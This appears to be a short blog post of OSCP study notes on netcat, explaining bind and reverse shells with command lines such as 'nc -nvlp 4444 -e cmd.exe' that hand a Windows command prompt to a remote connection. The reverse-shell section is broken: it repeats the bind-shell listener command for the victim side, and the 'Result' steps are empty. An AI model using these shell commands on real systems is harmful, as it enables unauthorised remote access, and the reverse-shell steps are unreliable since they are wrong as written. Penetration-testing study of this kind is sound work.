OSCP Learning Notes - Netcat

Introduction to Netcat

  • Connecting va Listening
  • Bind Shells
    • Attacker connects to victim on listening port
  • Reverse Shells
    • Victim connects to attacker on listening port

Basic usage:

nc -nv IP Port

Bind Shell:

 1.On the Windows nc tool.

-nvlp 4444 -e cmd.exe

2. On the Kali nc tool.

nc -nv 10.0.0.16 4444

3.Result

 Reverse Shells

1.On the Kali nc tool.

nc -nvlp 4444

2.On the Windows nc tool.

-nvlp 4444 -e cmd.exe

3. Result

 

posted @ 2019-06-23 18:15  晨风_Eric  阅读(156)  评论(0编辑  收藏  举报